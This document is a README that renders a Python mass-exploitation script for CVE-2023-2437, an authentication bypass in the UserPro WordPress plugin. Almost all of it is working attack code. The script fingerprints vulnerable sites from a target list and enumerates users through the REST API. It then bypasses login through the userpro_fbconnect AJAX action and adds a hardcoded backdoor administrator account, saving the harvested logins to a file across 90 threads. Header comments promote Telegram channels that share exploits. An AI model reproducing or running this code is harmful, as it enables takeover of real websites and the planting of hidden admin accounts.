README.md
Rendering markdown...
import warnings, sys, re, random
import requests, json, urllib3, string
from colorama import init, Fore
from bs4 import BeautifulSoup, MarkupResemblesLocatorWarning
from multiprocessing.dummy import Pool
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
fm = Fore.MAGENTA
warnings.filterwarnings("ignore", category=MarkupResemblesLocatorWarning, module="bs4")
warnings.filterwarnings(
"ignore", category=requests.packages.urllib3.exceptions.InsecureRequestWarning
)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True) # Initialize colorama for automatic color reset
# Coded By RxR HaCkEr
# i m The Best i know <3
# My Telegram:@Mjzrh
# Channel Telegram:@CodeRxR
# Join To VIP We Share new exploit
# The Poc get From
# https://www.wordfence.com/blog/2023/11/several-critical-vulnerabilities-including-privilege-escalation-authentication-bypass-and-more-patched-in-userpro-wordpress-plugin/
#
try:
target = [line.strip() for line in open(sys.argv[1], mode='r', encoding='utf-8', errors='ignore').readlines()]
except IndexError:
path = str(sys.argv[0]).split('\\')
print(f'\n {fr} [!] Enter <{path[len(path) - 1]}> <sites.txt>')
sys.exit()
class CodeRxR:
def __init__(self):
self.print_banner()
self.headers = {'Connection': 'keep-alive','Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '1',
'User-Agent': "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0",'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate','Accept-Language': 'en-US,en;q=0.9,fr;q=0.8','referer': 'www.google.com'}
self.login = requests.Session()
def URLdomain(self, site):
if site.startswith("http://") :
site = site.replace("http://","")
elif site.startswith("https://") :
site = site.replace("https://","")
elif site.startswith(" ") :
site = site.replace("","")
else :
pass
pattern = re.compile('(.*)/')
while re.findall(pattern,site):
sitez = re.findall(pattern,site)
site = sitez[0]
return site
def print_banner(self):
banner = f"""{Fore.CYAN}
8888888b. 8888888b. 888 888 .d8888b. 888 8888888888
888 Y88b 888 Y88b 888 888 d88P Y88b 888 888
888 888 888 888 888 888 888 888 888 888
888 d88P 888 888 888 d88P 8888888888 8888b. 888 888 888 8888888 888d888
8888888P" `Y8bd8P' 8888888P" 888 888 "88b 888 888 .88P 888 888P"
888 T88b X88K 888 T88b 888 888 .d888888 888 888 888888K 888 888
888 T88b .d8""8b. 888 T88b 888 888 888 888 Y88b d88P 888 "88b 888 888
888 T88b 888 888 888 T88b 888 888 "Y888888 "Y8888P" 888 888 8888888888 888
{Fore.RESET}=============================================================
{Fore.CYAN}[ Coded By RxR HaCkEr ]
[ UserPro <= 5.1.1 – Authentication Bypass to Administrator ]
[ CVE-2023-2437 ]
[ ]
{Fore.RESET}=============================================================
{Fore.RED} [+]Auto Get Username admin and id\n [+]Get Access Admin and Create New User Administrator """
print(banner)
def CheckVuln(self, site):
domain = f"{self.URLdomain(site)}"
try:
url = f"https://{self.URLdomain(site)}"
check = requests.get(f'{url}/wp-content/plugins/userpro/css/userpro.min.css',headers=self.headers , timeout=15 , allow_redirects=False, verify=False)
if('<html' not in check.text and 'div.userpro-overlay-inner div.userpro' in check.text):
open('UserPro-Plugin.txt', 'a').write(site +'\n')
return True
else:
url = f"http://{self.URLdomain(site)}"
check1 = requests.get(f'{url}/wp-content/plugins/userpro/css/userpro.min.css',headers=self.headers,timeout=15 , allow_redirects=False)
if('<html' not in check.text and 'div.userpro-overlay-inner div.userpro' in check1.text):
open('UserPro-Plugin.txt', 'a').write(site +'\n')
#Exploit
return True
else:
return False
except :
return False
def extract_usernames(self, wordpress_url):
rest_api_usernames = self.get_usernames_rest_api(wordpress_url)
all_usernames = set(rest_api_usernames)
return list(all_usernames)
# Method 1: Using WordPress REST API
def get_usernames_rest_api(self, wordpress_url):
try:
headers = {'User-Agent': '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299'}
api_url = wordpress_url + '/wp-json/wp/v2/users'
response = requests.get(api_url, headers=headers, verify=False)
if response.status_code == 200:
users = response.json()
usernames = [user['slug'] for user in users]
ID = [Mid['id'] for Mid in users]
return usernames, ID
else:
print(f"Target:{wordpress_url} --> Failed to fetch usernames using REST API. Error: {response.text}")
return []
except:
pass
def add_user_in_wordpress(self, wordpress_url, wpnonce , username, email, password, first_name="", last_name="", url="", role="administrator"):
try:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299",
"Content-Type": "application/x-www-form-urlencoded",
}
#print(wordpress_url, wpnonce , username, email, password)
# Prepare the data for the POST request
data = {
'action': 'createuser',
'_wpnonce_create-user': wpnonce,
'_wp_http_referer': '/wp-admin/user-new.php',
'user_login': username,
'email': email,
'first_name': first_name,
'last_name': last_name,
'url': url,
'pass1': password,
'pass2': password,
'pw_weak': 'on',
'send_user_notification': '1',
'role': role,
'createuser': 'Add New User'
}
# Send the POST request
response = self.login.post(f"{wordpress_url}/wp-admin/user-new.php", data=data, headers=headers, verify=False, timeout=20)
# Check if the request was successful
if response.status_code == 200:
print(f"{Fore.CYAN}[+]Created User Administrator\n [+]UserName: {username}\n Password: {password}\n[+]Status:Added Successfully.{Fore.RESET}")
with open('Successfully_UserPro_Logins.txt', 'a') as Wpfile:
Wpfile.write(f"{wordpress_url}/wp-login.php:{username}:{password}\n")
else:
print(f"Target:{wordpress_url} --> Failed to add user. Status code: {response.status_code}")
except:
pass
def send_request(self, url, username="admin", id=1):
try:
wordpress_url = f"https://{self.URLdomain(url)}"
url = f"{wordpress_url}/wp-admin/admin-ajax.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299",
"Content-Type": "application/x-www-form-urlencoded",
}
payload = {
"action": "userpro_fbconnect",
"id":id,
"email":username}
Request_exploit = self.login.post(url, headers=headers, data=payload, verify=False, timeout=20)
Admin_Panel = f"{wordpress_url}/wp-admin/user-new.php"
response = self.login.get(Admin_Panel, headers=headers, verify=False, timeout=20)
check_string = f"<span class='display-name'>{username}</span>"
if 'wp-admin-bar-logout' in response.text or check_string in response.text:
print(f"[+]Target:{wordpress_url} -----:> {Fore.GREEN}Successfully eXploiTinG {Fore.RESET}")
print(f"[+]Username: {Fore.GREEN}{username}{Fore.RESET}")
print(f"[+]Password: {Fore.GREEN}{id}{Fore.RESET}")
print(f"[+]Admin Url:{Fore.GREEN} {wordpress_url}/wp-admin/{Fore.RESET}")
match = re.search(r'<input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="([^"]+)" />', response.text)
if match:
wpnonce = match.group(1)
self.add_user_in_wordpress(
wordpress_url,
wpnonce,
username='RxRHaCkEr',
email='[email protected]',
password='rxrhacker123!',
first_name='whoami',
last_name='imKing',
url='http://example.com',
role='administrator')
else:
print(f"[-]Target:{wordpress_url} ------> {fr} Not --> Vulnerability")
except:
print(f"[-]Target:{wordpress_url} ------> {fr} --> Request->Failed")
Scanner_ExpLoiT = CodeRxR()
def RunTool(url):
try:
if(Scanner_ExpLoiT.CheckVuln(url)):
# Get username , id
select_username = Scanner_ExpLoiT.get_usernames_rest_api(url)
if select_username is not None:
username = select_username[0][0]
id = select_username[1][0]
# exploit
Scanner_ExpLoiT.send_request(url, username, id)
else:
Scanner_ExpLoiT.send_request(url)
else:
print(f"[-]Target:{url} ------> {fr} Not Vulnerability")
except:
pass
mp = Pool(90)
mp.map(RunTool, target)
mp.close()
mp.join()